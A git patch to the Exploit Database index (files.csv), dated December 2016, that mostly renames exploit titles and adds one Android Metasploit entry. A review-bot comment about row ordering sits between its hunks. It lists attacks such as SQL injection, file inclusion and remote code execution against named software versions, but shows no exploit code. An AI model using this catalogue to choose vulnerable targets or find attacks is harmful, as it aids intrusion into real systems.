From 9f1fdff37d141ee8a65e0d22297c6341c357eb62 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Fri, 30 Dec 2016 05:01:19 +0000 Subject: [PATCH] DB: 2016-12-30 6 new exploits VicFTPS < 5.0 - (CWD) Remote Buffer Overflow (PoC) VicFTPS < 5.0 - 'CWD' Remote Buffer Overflow (PoC) SilverSHielD 1.0.2.34 - (opendir) Denial of Service SilverSHielD 1.0.2.34 - Denial of Service Android - get_user/put_user Exploit (Metasploit) LoudBlog 0.4 - (path) Arbitrary Remote File Inclusion LoudBlog 0.4 - Arbitrary Remote File Inclusion MyEvent 1.3 - (myevent_path) Remote File Inclusion MyEvent 1.3 - 'event.php' Remote File Inclusion LoudBlog 0.5 - (id) SQL Injection / Admin Credentials Disclosure LoudBlog 0.5 - SQL Injection / Admin Credentials Disclosure yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion Yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion PHP Easy Downloader 1.5 - (save.php) Remote Code Execution PHP Easy Downloader 1.5 - 'save.php' Remote Code Execution Ip Reg 0.3 - Multiple SQL Injections IP Reg 0.3 - Multiple SQL Injections AstroSPACES - 'id' SQL Injection AstroSPACES 1.1.1 - 'id' Parameter SQL Injection myEvent 1.6 - (viewevent.php) SQL Injection myEvent 1.6 - 'eventdate' Parameter SQL Injection Mosaic Commerce - 'category.php cid' SQL Injection Mosaic Commerce - 'cid' Parameter SQL Injection PokerMax Poker League - Insecure Cookie Handling Kure 0.6.3 - (index.php post & doc) Local File Inclusion PokerMax Poker League 0.13 - Insecure Cookie Handling Kure 0.6.3 - 'index.php' Local File Inclusion PHP Easy Downloader 1.5 - (file) File Disclosure PHP Easy Downloader 1.5 - 'file' Parameter File Disclosure Post Affiliate Pro 2.0 - (index.php md) Local File Inclusion Post Affiliate Pro 2.0 - 'md' Parameter Local File Inclusion XOOPS Module GesGaleri - (kategorino) SQL Injection XOOPS Module GesGaleri - SQL Injection zeeproperty - 'adid' SQL Injection zeeproperty - 'adid' Parameter SQL Injection Fast Click SQL 1.1.7 Lite - (init.php) Remote File Inclusion yappa-ng 2.3.3-beta0 - (album) Local File Inclusion Fast Click SQL 1.1.7 
Lite - 'init.php' Remote File Inclusion Yappa-ng 2.3.3-beta0 - 'album' Parameter Local File Inclusion WBB Plugin rGallery 1.09 - 'itemID' Blind SQL Injection e107 <= 0.7.13 - (usersettings.php) Blind SQL Injection Joomla! Component ds-syndicate - (feed_id) SQL Injection XOOPS Module makale - SQL Injection WBB Plugin rGallery 1.09 - 'itemID' Parameter Blind SQL Injection e107 <= 0.7.13 - 'usersettings.php' Blind SQL Injection Joomla! Component ds-syndicate - 'feed_id' Parameter SQL Injection XOOPS Module makale 0.26 - SQL Injection ShopMaker 1.0 - (product.php id) SQL Injection Joomla! Component Daily Message 1.0.3 - 'id' SQL Injection ShopMaker CMS 1.0 - 'id' Parameter SQL Injection Joomla! Component Daily Message 1.0.3 - 'id' Parameter SQL Injection phpcrs 2.06 - (importFunction) Local File Inclusion LoudBlog 0.8.0a - Authenticated (ajax.php) SQL Injection phpcrs 2.06 - 'importFunction' Parameter Local File Inclusion LoudBlog 0.8.0a - 'ajax.php' SQL Injection YDC - 'kdlist.php cat' SQL Injection YDC - 'cat' Parameter SQL Injection txtshop 1.0b (Windows) - 'Language' Local File Inclusion txtshop 1.0b (Windows) - 'Language' Parameter Local File Inclusion MindDezign Photo Gallery 2.2 - (index.php id) SQL Injection MindDezign Photo Gallery 2.2 - SQL Injection websvn 2.0 - Cross-Site Scripting / File Handling / Code Execution WebSVN 2.0 - Cross-Site Scripting / File Handling / Code Execution Aj RSS Reader - 'EditUrl.php url' SQL Injection Aj RSS Reader - 'url' Parameter SQL Injection WordPress Plugin Media Holder - 'mediaHolder.php id' SQL Injection SFS Ez Forum - 'forum.php id' SQL Injection WordPress Plugin Media Holder - SQL Injection SFS Ez Forum - SQL Injection e107 Plugin EasyShop - (category_id) Blind SQL Injection e107 Plugin EasyShop - 'category_id' Parameter Blind SQL Injection Post Affiliate Pro 3 - (umprof_status) Blind SQL Injection Post Affiliate Pro 3 - 'umprof_status' Parameter Blind SQL Injection CafeEngine - 'index.php catid' SQL Injection CafeEngine 
- 'catid' Parameter SQL Injection shopmaker CMS 2.0 - Blind SQL Injection / Local File Inclusion ShopMaker CMS 2.0 - Blind SQL Injection / Local File Inclusion CafeEngine CMS 2.3 - SQL Injection CafeEngine 2.3 - SQL Injection Yappa-NG 1.x/2.x - Unspecified Remote File Inclusion Yappa-NG 1.x/2.x - Unspecified Cross-Site Scripting Yappa-ng 1.x/2.x - Unspecified Remote File Inclusion Yappa-ng 1.x/2.x - Unspecified Cross-Site Scripting LoudBlog 0.41 - podcast.php id Parameter SQL Injection LoudBlog 0.41 - 'podcast.php' SQL Injection LoudBlog 0.41 - backend_settings.php language Parameter Traversal Arbitrary File Access LoudBlog 0.41 - 'backend_settings.php' Traversal Arbitrary File Access Fast Click SQL Lite 1.1.2/1.1.3 - show.php Remote File Inclusion Fast Click SQL Lite 1.1.2/1.1.3 - 'show.php' Remote File Inclusion myEvent 1.2/1.3 - Myevent.php Remote File Inclusion myEvent 1.2/1.3 - 'myevent.php' Remote File Inclusion Meeting Room Booking System (MRBS) 1.2.6 - day.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - week.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - month.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - search.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - report.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - help.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - 'day.php' Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - 'week.php' Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - 'month.php' Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - 'search.php' Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - 'report.php' Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - 'help.php' Cross-Site Scripting yappa-ng - 'index.php' album Parameter Cross-Site Scripting yappa-ng - Query 
String Cross-Site Scripting Yappa-ng - 'index.php' album Parameter Cross-Site Scripting Yappa-ng - Query String Cross-Site Scripting tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php type Parameter Cross-Site Scripting tinybrowser - /tiny_mce/plugins/tinybrowser/upload.php type Parameter Cross-Site Scripting tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php type Parameter Cross-Site Scripting tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php Empty type Parameter Directory Listing tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php Empty type Parameter Directory Listing tinybrowser - 'type' Parameter Cross-Site Scripting tinybrowser - 'tinybrowser.php' Directory Listing tinybrowser - 'edit.php' Directory Listing Joomla! Component aWeb Cart Watching System for Virtuemart 2.6.0 - SQL Injection PHPMailer < 5.2.18 - Remote Code Execution (Python) WordPress Plugin Slider Templatic Tevolution < 2.3.6 - Arbitrary File Upload Dell SonicWALL Global Management System GMS 8.1 - Blind SQL Injection Dell SonicWALL Secure Mobile Access SMA 8.1 - Cross-Site Scripting / Cross-Site Request Forgery --- files.csv | 120 ++++++++++++++------------- platforms/android/local/40975.rb | 81 ++++++++++++++++++ platforms/hardware/webapps/40977.txt | 112 +++++++++++++++++++++++++ platforms/hardware/webapps/40978.txt | 63 ++++++++++++++ platforms/php/webapps/38180.txt | 7 -- platforms/php/webapps/38181.txt | 7 -- platforms/php/webapps/40973.txt | 24 ++++++ platforms/php/webapps/40974.py | 65 +++++++++++++++ platforms/php/webapps/40976.txt | 24 ++++++ 9 files changed, 431 insertions(+), 72 deletions(-) create mode 100755 platforms/android/local/40975.rb create mode 100755 platforms/hardware/webapps/40977.txt create mode 100755 platforms/hardware/webapps/40978.txt delete mode 100755 platforms/php/webapps/38180.txt delete mode 100755 platforms/php/webapps/38181.txt create mode 100755 platforms/php/webapps/40973.txt create mode 100755 platforms/php/webapps/40974.py create 
mode 100755 platforms/php/webapps/40976.txt
diff --git a/files.csv b/files.csv
index 5c6607b0f..88bb43d40 100644
--- a/files.csv
+++ b/files.csv
@@ -503,7 +503,7 @@ id,file,description,date,author,platform,type,port
 3306,platforms/windows/dos/3306.pl,"MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial of Service",2007-02-14,mu-b,windows,dos,0
 3307,platforms/windows/dos/3307.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow (PoC)",2007-02-14,shinnai,windows,dos,0
 3308,platforms/windows/dos/3308.pl,"MailEnable Professional/Enterprise 2.37 - Denial of Service",2007-02-14,mu-b,windows,dos,0
-3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 - (CWD) Remote Buffer Overflow (PoC)",2007-02-18,r0ut3r,windows,dos,0
+3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 - 'CWD' Remote Buffer Overflow (PoC)",2007-02-18,r0ut3r,windows,dos,0
 3341,platforms/windows/dos/3341.cpp,"TurboFTP Server 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service",2007-02-20,Marsu,windows,dos,0
 3343,platforms/windows/dos/3343.cpp,"FTP Voyager 14.0.0.3 - (CWD) Remote Stack Overflow (PoC)",2007-02-20,Marsu,windows,dos,0
 3347,platforms/windows/dos/3347.cpp,"FTP Explorer 1.0.1 Build 047 - (CPU Consumption) Remote Denial of Service",2007-02-20,Marsu,windows,dos,0
@@ -838,7 +838,7 @@ id,file,description,date,author,platform,type,port
 6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0
 6805,platforms/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",multiple,dos,0
 6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0
-6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - (opendir) Denial of Service",2008-10-23,"Jeremy Brown",windows,dos,0
+6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - Denial of Service",2008-10-23,"Jeremy Brown",windows,dos,0
 6824,platforms/windows/dos/6824.txt,"Microsoft Windows Server - Code Execution (PoC) (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0
 6832,platforms/windows/dos/6832.html,"KVIrc 3.4.0 - Virgo Remote Format String (PoC)",2008-10-24,LiquidWorm,windows,dos,0
 6834,platforms/windows/dos/6834.c,"vicFTP 5.0 - 'LIST' Remote Denial of Service",2008-10-24,"Alfons Luja",windows,dos,0
@@ -8440,6 +8440,7 @@ id,file,description,date,author,platform,type,port
 38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0
 38138,platforms/osx/local/38138.txt,"Apple Mac OSX - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0
 38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - eReg.exe SEH/Unicode Buffer Overflow",2015-09-11,"Robbie Corley",windows,local,0
+40975,platforms/android/local/40975.rb,"Android - get_user/put_user Exploit (Metasploit)",2016-12-29,Metasploit,android,local,0
 38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - Overwrite (SEH) Buffer Overflow",2015-09-15,Un_N0n,windows,local,0
 38198,platforms/windows/local/38198.txt,"Microsoft Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
 38199,platforms/windows/local/38199.txt,"Microsoft Windows - NtUserGetClipboardAccessToken Token Leak (MS15-023)",2015-09-15,"Google Security Research",windows,local,0
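Review bot: The added 40975 row is inserted between ids 38147 and 38185, which breaks the ascending id order every surrounding row in this hunk follows; if files.csv is expected to stay id-sorted within the local section, the row belongs after the highest existing 40xxx local entry rather than here. The row itself is consistent with its neighbours (path under platforms/android/local, platform `android`, type `local`, port `0`) and its date matches the commit subject. The diffstat also lists new files 40973, 40974, 40976, 40977 and 40978 and the removal of 38180 and 38181, but no files.csv rows for any of them appear in the visible hunks, so either those hunks lie beyond this chunk or the index update is incomplete; worth confirming before merge.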
@@ -16028,7 +16029,7 @@ id,file,description,date,author,platform,type,port
 1457,platforms/php/webapps/1457.txt,"phpBB 2.0.19 - Cross-Site Scripting Remote Cookie Disclosure",2006-01-29,threesixthousan,php,webapps,0
 1459,platforms/php/webapps/1459.pl,"xeCMS 1.0.0 RC 2 - 'cookie' Remote Command Execution",2006-01-30,cijfer,php,webapps,0
 1461,platforms/php/webapps/1461.pl,"Invision Power Board Dragoran Portal Mod 1.3 - SQL Injection",2006-01-31,SkOd,php,webapps,0
-1467,platforms/php/webapps/1467.php,"LoudBlog 0.4 - (path) Arbitrary Remote File Inclusion",2006-02-03,rgod,php,webapps,0
+1467,platforms/php/webapps/1467.php,"LoudBlog 0.4 - Arbitrary Remote File Inclusion",2006-02-03,rgod,php,webapps,0
 1468,platforms/php/webapps/1468.php,"Clever Copy 3.0 - Admin Auth Details / SQL Injection",2006-02-04,rgod,php,webapps,0
 1469,platforms/php/webapps/1469.pl,"phpBB 2.0.19 - (Style Changer/Demo Mod) SQL Injection",2006-02-05,SkOd,php,webapps,0
 1471,platforms/cgi/webapps/1471.pl,"MyQuiz 1.01 - (PATH_INFO) Arbitrary Command Execution",2006-02-06,Hessam-x,cgi,webapps,0
@@ -16147,7 +16148,7 @@ id,file,description,date,author,platform,type,port
 1682,platforms/php/webapps/1682.php,"Fuju News 1.0 - Authentication Bypass / SQL Injection",2006-04-16,snatcher,php,webapps,0
 1683,platforms/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - SQL Injection",2006-04-16,snatcher,php,webapps,0
 1686,platforms/php/webapps/1686.pl,"FlexBB 0.5.5 - (/inc/start.php _COOKIE) SQL Bypass Exploit",2006-04-17,Devil-00,php,webapps,0
-1687,platforms/php/webapps/1687.txt,"MyEvent 1.3 - (myevent_path) Remote File Inclusion",2006-04-17,botan,php,webapps,0
+1687,platforms/php/webapps/1687.txt,"MyEvent 1.3 - 'event.php' Remote File Inclusion",2006-04-17,botan,php,webapps,0
 1694,platforms/php/webapps/1694.pl,"Internet PhotoShow 1.3 - 'page' Parameter Remote File Inclusion",2006-04-18,Hessam-x,php,webapps,0
 1695,platforms/php/webapps/1695.pl,"PHP Net Tools 2.7.1 - Remote Code Execution",2006-04-18,FOX_MULDER,php,webapps,0
 1697,platforms/php/webapps/1697.php,"PCPIN Chat 5.0.4 - (login/language) Remote Code Execution",2006-04-19,rgod,php,webapps,0
@@ -16381,7 +16382,7 @@ id,file,description,date,author,platform,type,port
 2036,platforms/php/webapps/2036.txt,"PHP-Post 1.0 - Cookie Modification Privilege Escalation",2006-07-18,FarhadKey,php,webapps,0
 2046,platforms/php/webapps/2046.txt,"iManage CMS 4.0.12 - 'absolute_path' Remote File Inclusion",2006-07-20,Matdhule,php,webapps,0
 2049,platforms/php/webapps/2049.txt,"SiteDepth CMS 3.0.1 - (SD_DIR) Remote File Inclusion",2006-07-20,Aesthetico,php,webapps,0
-2050,platforms/php/webapps/2050.php,"LoudBlog 0.5 - (id) SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps,0
+2050,platforms/php/webapps/2050.php,"LoudBlog 0.5 - SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps,0
 2058,platforms/php/webapps/2058.txt,"PHP Forge 3 Beta 2 - 'cfg_racine' Parameter Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps,0
 2060,platforms/php/webapps/2060.txt,"PHP Live! 3.2.1 - 'help.php' Remote File Inclusion",2006-07-23,magnific,php,webapps,0
 2062,platforms/php/webapps/2062.txt,"Mambo Component MoSpray 18RC1 - Remote File Inclusion",2006-07-23,"Kurdish Security",php,webapps,0
@@ -16553,7 +16554,7 @@ id,file,description,date,author,platform,type,port
 2289,platforms/php/webapps/2289.pl,"Annuaire 1Two 2.2 - SQL Injection",2006-09-02,DarkFig,php,webapps,0
 2290,platforms/php/webapps/2290.txt,"Dyncms Release 6 - (x_admindir) Remote File Inclusion",2006-09-02,SHiKaA,php,webapps,0
 2291,platforms/php/webapps/2291.php,"PmWiki 2.1.19 - (Zend_Hash_Del_Key_Or_Index) Remote Exploit",2006-09-03,rgod,php,webapps,0
-2292,platforms/php/webapps/2292.txt,"yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion",2006-09-03,SHiKaA,php,webapps,0
+2292,platforms/php/webapps/2292.txt,"Yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion",2006-09-03,SHiKaA,php,webapps,0
 2293,platforms/php/webapps/2293.txt,"FlashChat 4.5.7 - (aedating4CMS.php) Remote File Inclusion",2006-09-04,NeXtMaN,php,webapps,0
 2294,platforms/asp/webapps/2294.txt,"Muratsoft Haber Portal 3.6 - (tr) SQL Injection",2006-09-03,ASIANEAGLE,asp,webapps,0
 2295,platforms/php/webapps/2295.txt,"In-link 2.3.4 - (ADODB_DIR) Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0
@@ -16964,7 +16965,7 @@ id,file,description,date,author,platform,type,port
 2808,platforms/php/webapps/2808.txt,"Dicshunary 0.1a - (check_status.php) Remote File Inclusion",2006-11-17,DeltahackingTEAM,php,webapps,0
 2810,platforms/php/webapps/2810.php,"Oxygen 1.1.3 (O2PHP Bulletin Board) - SQL Injection",2006-11-18,DarkFig,php,webapps,0
 2811,platforms/php/webapps/2811.txt,"PHPWebThings 1.5.2 - (editor.php) Remote File Inclusion",2006-11-18,nuffsaid,php,webapps,0
-2812,platforms/php/webapps/2812.pl,"PHP Easy Downloader 1.5 - (save.php) Remote Code Execution",2006-11-18,nuffsaid,php,webapps,0
+2812,platforms/php/webapps/2812.pl,"PHP Easy Downloader 1.5 - 'save.php' Remote Code Execution",2006-11-18,nuffsaid,php,webapps,0
 2813,platforms/asp/webapps/2813.txt,"ASPNuke 0.80 - (register.asp) SQL Injection",2006-11-19,ajann,asp,webapps,0
 2814,platforms/php/webapps/2814.txt,"PHPQuickGallery 1.9 - (textFile) Remote File Inclusion",2006-11-19,"Al7ejaz Hacker",php,webapps,0
 2817,platforms/php/webapps/2817.txt,"Photo Cart 3.9 - (adminprint.php) Remote File Inclusion",2006-11-21,irvian,php,webapps,0
@@ -18172,7 +18173,7 @@ id,file,description,date,author,platform,type,port
 4768,platforms/php/webapps/4768.py,"Shadowed Portal 5.7d3 - Remote Command Execution",2007-12-21,The:Paradox,php,webapps,0
 4769,platforms/php/webapps/4769.txt,"Shadowed Portal 5.7d3 - (POST) Remote File Inclusion",2007-12-21,The:Paradox,php,webapps,0
 4770,platforms/php/webapps/4770.txt,"Wallpaper Site 1.0.09 - (category.php) SQL Injection",2007-12-22,Koller,php,webapps,0
-4771,platforms/php/webapps/4771.txt,"Ip Reg 0.3 - Multiple SQL Injections",2007-12-22,MhZ91,php,webapps,0
+4771,platforms/php/webapps/4771.txt,"IP Reg 0.3 - Multiple SQL Injections",2007-12-22,MhZ91,php,webapps,0
 4772,platforms/php/webapps/4772.txt,"zBlog 1.2 - SQL Injection",2007-12-22,Houssamix,php,webapps,0
 4774,platforms/php/webapps/4774.pl,"PHP ZLink 0.3 - (go.php) SQL Injection",2007-12-23,DNX,php,webapps,0
 4775,platforms/php/webapps/4775.txt,"Adult Script 1.6.5 - Multiple SQL Injections",2007-12-23,MhZ91,php,webapps,0
@@ -19682,65 +19683,65 @@ id,file,description,date,author,platform,type,port
 6751,platforms/php/webapps/6751.txt,"SezHoo 0.1 - Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps,0
 6754,platforms/php/webapps/6754.txt,"My PHP Dating - 'id' Parameter SQL Injection",2008-10-14,Hakxer,php,webapps,0
 6755,platforms/php/webapps/6755.php,"PHPWebGallery 1.7.2 - Session Hijacking / Code Execution",2008-10-14,EgiX,php,webapps,0
-6758,platforms/php/webapps/6758.txt,"AstroSPACES - 'id' SQL Injection",2008-10-15,TurkishWarriorr,php,webapps,0
+6758,platforms/php/webapps/6758.txt,"AstroSPACES 1.1.1 - 'id' Parameter SQL Injection",2008-10-15,TurkishWarriorr,php,webapps,0
 6759,platforms/php/webapps/6759.txt,"mystats - 'hits.php' Multiple Vulnerabilities",2008-10-15,JosS,php,webapps,0
-6760,platforms/php/webapps/6760.txt,"myEvent 1.6 - (viewevent.php) SQL Injection",2008-10-15,JosS,php,webapps,0
+6760,platforms/php/webapps/6760.txt,"myEvent 1.6 - 'eventdate' Parameter SQL Injection",2008-10-15,JosS,php,webapps,0
 6762,platforms/php/webapps/6762.txt,"CafeEngine - Multiple SQL Injections",2008-10-16,0xFFFFFF,php,webapps,0
-6763,platforms/php/webapps/6763.txt,"Mosaic Commerce - 'category.php cid' SQL Injection",2008-10-16,"Ali Abbasi",php,webapps,0
+6763,platforms/php/webapps/6763.txt,"Mosaic Commerce - 'cid' Parameter SQL Injection",2008-10-16,"Ali Abbasi",php,webapps,0
 6764,platforms/php/webapps/6764.php,"Mic_blog 0.0.3 - SQL Injection / Privilege Escalation",2008-10-16,StAkeR,php,webapps,0
 6765,platforms/php/webapps/6765.txt,"IP Reg 0.4 - Multiple SQL Injections",2008-10-16,JosS,php,webapps,0
-6766,platforms/php/webapps/6766.txt,"PokerMax Poker League - Insecure Cookie Handling",2008-10-16,DaRkLiFe,php,webapps,0
-6767,platforms/php/webapps/6767.txt,"Kure 0.6.3 - (index.php post & doc) Local File Inclusion",2008-10-16,JosS,php,webapps,0
+6766,platforms/php/webapps/6766.txt,"PokerMax Poker League 0.13 - Insecure Cookie Handling",2008-10-16,DaRkLiFe,php,webapps,0
+6767,platforms/php/webapps/6767.txt,"Kure 0.6.3 - 'index.php' Local File Inclusion",2008-10-16,JosS,php,webapps,0
 6768,platforms/php/webapps/6768.txt,"Mantis Bug Tracker 1.1.3 - Remote Code Execution",2008-10-16,EgiX,php,webapps,0
 6769,platforms/php/webapps/6769.pl,"iGaming CMS 2.0 Alpha 1 - 'search.php' SQL Injection",2008-10-16,StAkeR,php,webapps,0
-6770,platforms/php/webapps/6770.txt,"PHP Easy Downloader 1.5 - (file) File Disclosure",2008-10-16,LMaster,php,webapps,0
+6770,platforms/php/webapps/6770.txt,"PHP Easy Downloader 1.5 - 'file' Parameter File Disclosure",2008-10-16,LMaster,php,webapps,0
 6771,platforms/cgi/webapps/6771.txt,"Calendars for the Web 4.02 - Admin Authentication Bypass",2008-10-16,SecVuln,cgi,webapps,0
-6772,platforms/php/webapps/6772.txt,"Post Affiliate Pro 2.0 - (index.php md) Local File Inclusion",2008-10-16,ZeN,php,webapps,0
+6772,platforms/php/webapps/6772.txt,"Post Affiliate Pro 2.0 - 'md' Parameter Local File Inclusion",2008-10-16,ZeN,php,webapps,0
 6777,platforms/php/webapps/6777.txt,"WordPress Plugin st_newsletter - 'stnl_iframe.php' SQL Injection",2008-10-17,r45c4l,php,webapps,0
-6778,platforms/php/webapps/6778.pl,"XOOPS Module GesGaleri - (kategorino) SQL Injection",2008-10-18,EcHoLL,php,webapps,0
+6778,platforms/php/webapps/6778.pl,"XOOPS Module GesGaleri - SQL Injection",2008-10-18,EcHoLL,php,webapps,0
 6779,platforms/php/webapps/6779.txt,"phpFastNews 1.0.0 - Insecure Cookie Handling",2008-10-18,Qabandi,php,webapps,0
-6780,platforms/php/webapps/6780.txt,"zeeproperty - 'adid' SQL Injection",2008-10-18,"Hussin X",php,webapps,0
+6780,platforms/php/webapps/6780.txt,"zeeproperty - 'adid' Parameter SQL Injection",2008-10-18,"Hussin X",php,webapps,0
 6781,platforms/php/webapps/6781.pl,"Meeting Room Booking System (MRBS) < 1.4 - SQL Injection",2008-10-18,Xianur0,php,webapps,0
 6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 - 'del.php' Blind SQL Injection",2008-10-18,StAkeR,php,webapps,0
 6783,platforms/php/webapps/6783.php,"Nuke ET 3.4 - 'FCKeditor' Arbitrary File Upload",2008-10-18,EgiX,php,webapps,0
 6784,platforms/php/webapps/6784.pl,"PHP Easy Downloader 1.5 - Remote File Creation",2008-10-18,StAkeR,php,webapps,0
-6785,platforms/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite - (init.php) Remote File Inclusion",2008-10-19,NoGe,php,webapps,0
-6788,platforms/php/webapps/6788.txt,"yappa-ng 2.3.3-beta0 - (album) Local File Inclusion",2008-10-19,Vrs-hCk,php,webapps,0
+6785,platforms/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite - 'init.php' Remote File Inclusion",2008-10-19,NoGe,php,webapps,0
+6788,platforms/php/webapps/6788.txt,"Yappa-ng 2.3.3-beta0 - 'album' Parameter Local File Inclusion",2008-10-19,Vrs-hCk,php,webapps,0
 6789,platforms/php/webapps/6789.pl,"Vivvo CMS 3.4 - Multiple Vulnerabilities",2008-10-19,Xianur0,php,webapps,0
-6790,platforms/php/webapps/6790.py,"WBB Plugin rGallery 1.09 - 'itemID' Blind SQL Injection",2008-10-20,Five-Three-Nine,php,webapps,0
-6791,platforms/php/webapps/6791.pl,"e107 <= 0.7.13 - (usersettings.php) Blind SQL Injection",2008-10-19,girex,php,webapps,0
-6792,platforms/php/webapps/6792.txt,"Joomla! Component ds-syndicate - (feed_id) SQL Injection",2008-10-20,boom3rang,php,webapps,0
-6795,platforms/php/webapps/6795.txt,"XOOPS Module makale - SQL Injection",2008-10-20,EcHoLL,php,webapps,0
+6790,platforms/php/webapps/6790.py,"WBB Plugin rGallery 1.09 - 'itemID' Parameter Blind SQL Injection",2008-10-20,Five-Three-Nine,php,webapps,0
+6791,platforms/php/webapps/6791.pl,"e107 <= 0.7.13 - 'usersettings.php' Blind SQL Injection",2008-10-19,girex,php,webapps,0
+6792,platforms/php/webapps/6792.txt,"Joomla! Component ds-syndicate - 'feed_id' Parameter SQL Injection",2008-10-20,boom3rang,php,webapps,0
+6795,platforms/php/webapps/6795.txt,"XOOPS Module makale 0.26 - SQL Injection",2008-10-20,EcHoLL,php,webapps,0
 6796,platforms/php/webapps/6796.txt,"Limbo CMS - (Private Messaging Component) SQL Injection",2008-10-21,StAkeR,php,webapps,0
 6797,platforms/php/webapps/6797.txt,"LightBlog 9.8 - (GET & POST & COOKIE) Multiple Local File Inclusion Vulnerabilities",2008-10-21,JosS,php,webapps,0
-6799,platforms/php/webapps/6799.txt,"ShopMaker 1.0 - (product.php id) SQL Injection",2008-10-21,"Hussin X",php,webapps,0
-6802,platforms/php/webapps/6802.txt,"Joomla! Component Daily Message 1.0.3 - 'id' SQL Injection",2008-10-22,H!tm@N,php,webapps,0
+6799,platforms/php/webapps/6799.txt,"ShopMaker CMS 1.0 - 'id' Parameter SQL Injection",2008-10-21,"Hussin X",php,webapps,0
+6802,platforms/php/webapps/6802.txt,"Joomla! Component Daily Message 1.0.3 - 'id' Parameter SQL Injection",2008-10-22,H!tm@N,php,webapps,0
 6803,platforms/php/webapps/6803.txt,"Iamma Simple Gallery 1.0/2.0 - Arbitrary File Upload",2008-10-22,x0r,php,webapps,0
-6806,platforms/php/webapps/6806.txt,"phpcrs 2.06 - (importFunction) Local File Inclusion",2008-10-22,Pepelux,php,webapps,0
-6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - Authenticated (ajax.php) SQL Injection",2008-10-22,Xianur0,php,webapps,0
+6806,platforms/php/webapps/6806.txt,"phpcrs 2.06 - 'importFunction' Parameter Local File Inclusion",2008-10-22,Pepelux,php,webapps,0
+6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - 'ajax.php' SQL Injection",2008-10-22,Xianur0,php,webapps,0
 6809,platforms/php/webapps/6809.txt,"Joomla! Component ionFiles 4.4.2 - File Disclosure",2008-10-22,Vrs-hCk,php,webapps,0
 6810,platforms/asp/webapps/6810.txt,"DorsaCMS - 'ShowPage.aspx' SQL Injection",2008-10-22,syst3m_f4ult,asp,webapps,0
-6811,platforms/php/webapps/6811.txt,"YDC - 'kdlist.php cat' SQL Injection",2008-10-22,"Hussin X",php,webapps,0
+6811,platforms/php/webapps/6811.txt,"YDC - 'cat' Parameter SQL Injection",2008-10-22,"Hussin X",php,webapps,0
 6814,platforms/php/webapps/6814.php,"CSPartner 1.0 - (Delete All Users / SQL Injection) Remote Exploit",2008-10-23,StAkeR,php,webapps,0
-6816,platforms/php/webapps/6816.txt,"txtshop 1.0b (Windows) - 'Language' Local File Inclusion",2008-10-23,Pepelux,php,webapps,0
+6816,platforms/php/webapps/6816.txt,"txtshop 1.0b (Windows) - 'Language' Parameter Local File Inclusion",2008-10-23,Pepelux,php,webapps,0
 6817,platforms/php/webapps/6817.txt,"Joomla! Component RWCards 3.0.11 - Local File Inclusion",2008-10-23,Vrs-hCk,php,webapps,0
 6818,platforms/php/webapps/6818.txt,"aflog 1.01 - Multiple Insecure Cookie Handling Vulnerabilities",2008-10-23,JosS,php,webapps,0
-6819,platforms/php/webapps/6819.txt,"MindDezign Photo Gallery 2.2 - (index.php id) SQL Injection",2008-10-23,"CWH Underground",php,webapps,0
+6819,platforms/php/webapps/6819.txt,"MindDezign Photo Gallery 2.2 - SQL Injection",2008-10-23,"CWH Underground",php,webapps,0
